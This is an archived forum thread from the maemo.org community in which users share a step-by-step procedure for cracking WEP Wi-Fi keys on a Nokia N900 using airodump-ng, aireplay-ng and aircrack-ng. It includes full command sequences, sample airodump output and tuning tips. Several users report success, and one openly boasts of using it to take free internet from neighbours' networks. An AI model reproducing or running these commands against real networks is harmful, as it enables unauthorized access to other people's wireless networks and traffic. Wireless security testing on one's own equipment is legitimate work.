maemo.org - Talk

maemo.org - Talk (https://talk.maemo.org/index.php)
-   Applications (https://talk.maemo.org/forumdisplay.php?f=41)
-   -   N900 WEP cracking / Backtrack 3 (https://talk.maemo.org/showthread.php?t=32015)

cweedon@yahoo.com 2010-02-20 00:47

Re: N900 WEP cracking / Backtrack 3
 
i think he wanted a spoonfeed on aircrack itself and not getting into monitor mode, either way he needs a healthy dose of google-fu

toranz 2010-03-06 15:02

Re: N900 WEP cracking / Backtrack 3
 
even google doesn't seem to help here...

Whig 2010-05-03 06:22

Re: N900 WEP cracking / Backtrack 3
 
Quote:

Originally Posted by 1337 (Post 332541)
Hi,

Does the N900 support WEP cracking, thus the internal WIFI packet injection?

kismet
nokimet
aircrack-NG

If not, what external WIFI that does can be connected?
Anyone connected a keyboard to their N900 or how does screen connect with S-video out (computerscreen?)

Now it's possible to run Kismet on N900 pretty easily =)
And it seems to work better than I thought because even GPS is working:
http://www.petrilopia.net/wordpress/...ng-nokia-n900/

admiral0 2010-05-03 06:49

Re: N900 WEP cracking / Backtrack 3
 
i hate wannabe hackers that don't even realise what "monitor mode" and "packet injection" means

badboyuk 2010-05-03 12:23

Re: N900 WEP cracking / Backtrack 3
 
Quote:

Originally Posted by cweedon@yahoo.com (Post 489463)
just to get you started cause airmon-ng is not supported and that is what most people on the backtrack forums go to first.

'sudo gainroot' or 'root' if you have rootsh installed
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airodump -w capture -c(whateverchannel you want) wlan0

followed the instructions on here but the last command fails. I have tried getting aircrack to run diff way by following this lil guide http://www.aircrack-ng.org/doku.php?id=simple_wep_crack but after a few steps, it turns out I need to download/install wifi drivers.

All in all this app could be useful if more info was provided on it. Its easy for folk who know of it and have been using it in the past on other devices etc....but for new newbies its like running into a brick wall!

If anyone can help or provide some further info that can help then it will be appreciated :)

assetburned 2010-05-03 20:32

Re: N900 WEP cracking / Backtrack 3
 
hmm any chance that you put that into a garage project?

kingoddball 2010-05-04 06:58

Re: N900 WEP cracking / Backtrack 3
 
Does anyone have a working guide on how to use aircrack-ng or kismet to crack a WEP locked network? The network is MY OWN and it is just for testing purposes.... :D

I will install both Aircrack and Kismet ASAP. :eek:

dashti 2010-05-13 19:43

Re: N900 WEP cracking / Backtrack 3
 
any update for the aircrack ?

Whig 2010-05-24 07:15

Re: N900 WEP cracking / Backtrack 3
 
Quote:

Originally Posted by kingoddball (Post 641939)
Does anyone have a working guide on how to use aircrack-ng or kismet to crack a WEP locked network? The network is MY OWN and it is just for testing purposes.... :D

I will install both Aircrack and Kismet ASAP. :eek:

One way to do it with PC aircrack-ng and airodump-ng:
Cracking WEP with aircrack-ng and airodump-ng

Have you tried if same works with N900 aircrack-ng and airodump?

q6600 2010-06-13 15:37

Re: N900 WEP cracking / Backtrack 3
 
hy
i try and it works to capture data with aerodump and crack the wep key with aircrack on n900 ( this assuming you have a client conected )

aikon800 2010-06-13 15:49

Re: N900 WEP cracking / Backtrack 3
 
Quote:

Originally Posted by q6600 (Post 713291)
hy
i try and it works to capture data with aerodump and crack the wep key with aircrack on n900 ( this assuming you have a client conected )

Hi q6600

can you please share with us how did you get aircrack to crack a wep-network, step by step. Thanks

q6600 2010-06-14 11:06

Re: N900 WEP cracking / Backtrack 3
 
hi this will work only if a client is conected on the network.
your bluethoot must be off
1- nokia n900 with prm 1.2
2-update your krenel to power krenel from dl sistem ( reboot )
2-instll aircrack-ng
3-install rootsh
4- oper xterminal type root and enter
5-airodump-ng wlan0 ( put on a paper bssid, station and chanel ) when you have this presc ctr+c
6-in the same window
airodump-ng -w wep -c [channel number] --bssid [bssid number] [wireless card name]
7-open a new xterminal windo type root and enter
8-aireplay-ng -1 0 -a [bssid] [wireless card name]
9-open the 3 rd windo type root and enter
aireplay-ng -3 -b [bssid] [wireless card name]
10- go on window 1 and wait til you got 50.000 data pack
11-when you have 50.000 data pack prec ctr+c ( in all windows)
12-go on 3 rd window and type
cd /root
ls
and now looke for a file with .cap (ezxtention .cap)
13-aircrack-ng [filename].cap and you will have your wep key
14- if you need space in root delete the.cap files.
cd /root
rm (name of the file)
example rm wep-01.cap
please note that is ilegale to crack wep keys ( play wit your roouter )
let me know if you manage to do it.

Laughingstok 2010-06-14 14:38

Re: N900 WEP cracking / Backtrack 3
 
N900 wifi driver is not capable of packet injection. So waiting for the packets is going to take a while. You cannot use aireplay to inject packets.

q6600 2010-06-14 16:04

Re: N900 WEP cracking / Backtrack 3
 
Quote:

Originally Posted by Laughingstok (Post 714568)
N900 wifi driver is not capable of packet injection. So waiting for the packets is going to take a while. You cannot use aireplay to inject packets.

like this laughingstok sad injection is not working sao you can skip that step with aireplay.
what i did i put my laptop to dl a masive file to have trafic.

q6600 2010-06-15 13:18

Re: N900 WEP cracking / Backtrack 3
 
Quote:

Originally Posted by Laughingstok (Post 714568)
N900 wifi driver is not capable of packet injection. So waiting for the packets is going to take a while. You cannot use aireplay to inject packets.

can you use aireplay to do a Deauthentication foa a handshake with n900? or you ahve to be lucky to cach one?

suphiceto 2010-06-17 21:53

Re: N900 WEP cracking / Backtrack 3
 
@ q6600 thanks for the step by step guide.. This by far seems to be only guide that is out there for N900...

Although I have couple questions. what exactly is [wireless card name] is referring to? and also on the 5th step, you sad to put down station# and it looks like you never used the station# again. Could you please identify the difference between bssid and station. Thanks.

naturegodtm 2010-06-18 02:42

Re: N900 WEP cracking / Backtrack 3
 
hi i bought my n900 yesterday. well if i wanted to make the injection working , what would i have to do? i have the time and the willing .i have some fundamendal programming skills (c++) a bit of networking . where should i start?

q6600 2010-06-18 17:41

Re: N900 WEP cracking / Backtrack 3
 
@suphiceto
for n900 the name of the wirles card is wlan0
example: airodump-ng wlan0
you need a bssid and a station ( the router and the pc conected to the router) if you dont have a pc conected you will not be able to capute data pack)
this is a example
CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782

first is the router and station is the pc conected to taht router. ( at the moment the injection is not working, and you need a pc conected )

jake2kone 2010-06-22 14:55

Re: N900 WEP cracking / Backtrack 3
 
The injection isn't possible atm. Use the Tita-Kernel version <26 and you can scan other channels than only #6.
The Backtrack-mobile Team is working on the injection.

German readers can continue here.

matthewbpt 2010-07-26 11:23

Re: N900 WEP cracking / Backtrack 3
 
It seems they managed http://www.youtube.com/watch?v=IXfGGOa-skA I really want to know how they did it! Does anybody know?

lfkfe 2010-09-12 21:58

Re: N900 WEP cracking / Backtrack 3
 
I want it! Updates pleeeaaase!!

Ele-Mental 2010-11-02 06:34

Re: N900 WEP cracking / Backtrack 3
 
Quote:

Originally Posted by q6600 (Post 714285)
hi this will work only if a client is conected on the network.
your bluethoot must be off
1- nokia n900 with prm 1.2
2-update your krenel to power krenel from dl sistem ( reboot )
2-instll aircrack-ng
3-install rootsh
4- oper xterminal type root and enter
5-airodump-ng wlan0 ( put on a paper bssid, station and chanel ) when you have this presc ctr+c
6-in the same window
airodump-ng -w wep -c [channel number] --bssid [bssid number] [wireless card name]
7-open a new xterminal windo type root and enter
8-aireplay-ng -1 0 -a [bssid] [wireless card name]
9-open the 3 rd windo type root and enter
aireplay-ng -3 -b [bssid] [wireless card name]
10- go on window 1 and wait til you got 50.000 data pack
11-when you have 50.000 data pack prec ctr+c ( in all windows)
12-go on 3 rd window and type
cd /root
ls
and now looke for a file with .cap (ezxtention .cap)
13-aircrack-ng [filename].cap and you will have your wep key
14- if you need space in root delete the.cap files.
cd /root
rm (name of the file)
example rm wep-01.cap
please note that is ilegale to crack wep keys ( play wit your roouter )
let me know if you manage to do it.


This worked! Key Found! Decrypted correctly: 100% :eek: I was sooo surprised to see my key there. Thanx man!

one1002 2010-11-02 07:31

Re: N900 WEP cracking / Backtrack 3
 
u can actually decrypt any WEP key (client/non-client) with neopwn..

i have successfully installed, run, and decrypt WEPs with neopwn and GrimWepa..

thx to some users who helped..especially OptX, xopher and badfusion..

Ele-Mental 2010-11-02 07:38

Re: N900 WEP cracking / Backtrack 3
 
Ok so everything works. Now im trying to understand every aspect of what is happening. I understand every command, but step 8 and 9. what does "-1 0" and "-3" stand for?

kamiwey 2010-11-02 07:51

Re: N900 WEP cracking / Backtrack 3
 
Quote:

Originally Posted by Ele-Mental (Post 860563)
Ok so everything works. Now im trying to understand every aspect of what is happening. I understand every command, but step 8 and 9. what does "-1 0" and "-3" stand for?

hello, the -1 and -3 is to set the kind of atack whit aireplay

luketanti 2010-11-02 08:30

Re: N900 WEP cracking / Backtrack 3
 
Hello. I do not know where to get neopwn from. I read that it is going to be in beta soon but you already used it. Can you tell me the download link please?

Ele-Mental 2010-11-02 13:01

Re: N900 WEP cracking / Backtrack 3
 
Quote:

Originally Posted by kamiwey (Post 860571)
hello, the -1 and -3 is to set the kind of atack whit aireplay

Please correct me if i am wrong, but that basically means im doing a fake authentication, deauthentication and ARP request replay attack?

TDSii 2010-11-19 21:03

Re: N900 WEP cracking / Backtrack 3
 
method works great!

some tips:
the "station" is not used at all.
copy paste the required parameters into a notepad or something like leafpad and copy paste when requested (this will avoid mistakes)
you need to run 3 commands the second command finish in 10 seconds so it is normal.
your key will be something like xx:xx:xx:xx:xx so simply remove the : to get the key.
u will get 2 cap files wep-xx and reply-xx... u need the wep-xx.cap
the cap file might be in the same folder u run the commands on and not the root.
leave it for at least 40 mins to collect packets, am not a pro and seriously i don't know what are those readings so just leave it for sometime, my first trial failed coz i gave it 15 mins only.
use it during busy time of the day, don't wait till the end of midnight where no people r using, remember this method is based on packet sniffing.
your n900 will heat up so be careful and use battery cable as it will drain battery in less than an hour.
start testing on your own secured WEP router first, when it works the first time you will gain confidence ;)

good luck n900s! say thanks

TDSii 2010-11-19 21:16

Re: N900 WEP cracking / Backtrack 3
 
can someone be find enough to translate this page and improve where possible: http://www.phonesfera.com/tutorial-w...312.html#p7312

Captwheeto 2010-11-19 21:42

Re: N900 WEP cracking / Backtrack 3
 
Quote:

Originally Posted by TDSii (Post 878323)
start testing on your own secured WEP router first, when it works the first time you will gain confidence ;)

Testing what? A vulnerability that is nine years old? THERE IS NOTHING TO TEST. None of you are fooling anyone with your 'making sure my network is secure herp derp'. It should be common knowledge by now that WEP is deprecated as a security measure. Just own up to being dirty little skids

TDSii 2010-11-19 22:13

Re: N900 WEP cracking / Backtrack 3
 
Captwheeto well it was until today i was able to get though WEP using n900. and nothing beats the free internet now! almost all my neighbors are using WEP. so beat it buddy!!

hawaii 2010-11-19 23:18

Re: N900 WEP cracking / Backtrack 3
 
roffle.

That went right over your head, buddy.

moste 2010-12-08 20:48

Re: N900 WEP cracking / Backtrack 3
 
Quote:

Originally Posted by Ele-Mental (Post 860513)
This worked! Key Found! Decrypted correctly: 100% :eek: I was sooo surprised to see my key there. Thanx man!

i've a problem with 1st steps, please help

1-update your krenel to power krenel from dl sistem ( reboot )
2-instll aircrack-ng
3-install rootsh

krisgesling 2011-06-13 13:26

Re: N900 WEP cracking / Backtrack 3
 
Quote:

Originally Posted by moste (Post 892623)
i've a problem with 1st steps, please help

1-update your krenel to power krenel from dl sistem ( reboot )
2-instll aircrack-ng
3-install rootsh

Other than misspelling kernel I don't know what more advice can be provided on how to install some packages, if you're having trouble with these steps then you need to learn a lot more of the basics first.

sifo 2012-03-01 20:23

Re: N900 WEP cracking / Backtrack 3
 
1 Attachment(s)
hi im a starter to aircrack just wanna know what is the needed packages to crack a wep station i have installed aircrack-ng asterisk kismet and cleven is there any other thing needed for that plz i hope finding the answer thanx.:confused:


after a few days i got the key for my wep staton successfuy
this is the result:eek::eek::eek::cool:
ALL THANKS TO OUR FRIEND TORPEDO48 FOR THE EASY GUID

jedge 2012-03-21 17:25

Re: N900 WEP cracking / Backtrack 3
 
For those with the n8x0 (n810 specifically) I've created a tutorial on how to get kismet and aircrack-ng working. All information is included from how to flash all the way to installing kismet and aircrack-ng with a lot in between.

I still use my n810 for wireless assessments.

http://www.jedge.com/wordpress/2011/...less-auditing/


All times are GMT. The time now is 11:44.

vBulletin® Version 3.8.8